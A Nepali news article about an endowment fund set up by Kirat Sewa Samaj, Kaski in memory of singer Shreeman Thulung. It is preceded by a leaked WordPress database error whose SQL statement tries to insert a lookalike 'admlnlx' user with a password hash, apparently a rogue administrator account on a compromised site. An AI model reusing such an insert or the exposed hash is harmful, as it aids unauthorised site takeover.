WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BmsiuRHDpC6ybjqmivuF1Y.WrtDPyr1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 21:28:56', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । गायक तथा संगीतकार श्रीमान थुलुङको स्मृतिमा तीन लाख रुपैयाँको अक्षयकोष स्थापना गरिएको छ ।
थुलुङको दोस्रो वार्षिक स्मृति दिवसका अवसरमा शुक्रबार किरात सेवा समाज, कास्कीले आयोजना गरेको कार्यक्रममा सो अक्षयकोषको घोषणा गरिएको हो ।
किरात सेवा समाज, कास्कीको संरक्षणमा रहने गरी स्थापना गरिएको अक्षयकोषको ब्यजाबाट प्रत्येक वर्ष गायक थुलुङको स्मृति दिवसको अवसर पारेर गीत, संगीत क्षेत्रमा योगदान दिने स्रष्टालाई सम्मान गरिनेछ ।
किरात सेवा समाज, कास्कीका संरक्षक डा. लक्ष्मीप्रसाद राईले भौतिक शरीर नभएपनि गीत संगीतले श्रीमान थुलुङलाई सधैं बाँचिरहने बताए । कार्यक्रममा चोमोलोङ्मा प्रतिष्ठान नेपालका अध्यक्ष जसिहाङ राई, सचिव सुरेश जमरकट्टेल, किरात सेवा समाज, कास्कीका वरिष्ठ सल्लाहकार गणेशबहादुर देवान, पूर्वाञ्चल सेवा समाज, कास्कीका अध्यक्ष गोपाल खड्का, संगीतकार नवराज बराल, स्मृतिमा श्रीमान थुलुङ स्मृति ग्रन्थका सम्पादक अनुराग अधिकारी र पूर्ण लामाले थुलुङ नेपाली संगीत क्षेत्रमा पु¥याएको योगदानबारे चर्चा गर्नुभएको थियो । त्यस्तै, कार्यक्रममा किरात सेवा समाज, कास्कीका उपाध्यक्ष मनकुमार सुनुवार र सचिव नवीन राईले पनि आ–आफ्नो भनाइ राख्नुभएको थियो ।
किरात सेवा समाज, कास्कीका अध्यक्ष लोकेन्द्र चाम्लिङ राईको अध्यक्षतामा भएको कार्यक्रममा घोषणा गरिएको अक्षयकोषको संरक्षकमा संगीतकार थुलुङकी धर्मपत्नी विमला राई संरक्षक, डीबी राई संयोजक र किरात सेवा समाज, कास्कीका अध्यक्ष वा अध्यक्षले तोकेको प्रतिनिधि सदस्य रहने व्यवस्था गरिएको छ । अक्षयकोषमार्फत् गरिने सम्मानलाई राष्ट्रव्यापी बनाइने अक्षयकोषका संयोजक राईले बताए ।
किरात सेवा समाज, कास्कीका अध्यक्ष लोकेन्द्र चाम्लिङ राईले अक्षयकोषका लागि १५ हजार ५ रुपैयाँ सहयोग गर्नुभएको छ । त्यसैगरी, समाजको तर्फबाट १० हजार रुपैयाँ सहयोग गर्ने निर्णय भएको समेत अध्यक्ष चाम्लिङले जानकारी दिनुभयो । अक्षयकोष घोषणा कार्यक्रममा गायक थुलुङका छोरीद्वय गायिका स्मृति राई र संगीता राईले आफ्नो गायन प्रस्तुती राखेका थिए । श्रीमान थुलुङ स्मृति अक्षयकोष घोषणा कार्यक्रमकै अवसरमा किरात सेवा समाज, कास्कीद्वारा प्रकाशित २०७८ सालको भित्तेपात्रो लोकार्पण समेत गरिएको थियो ।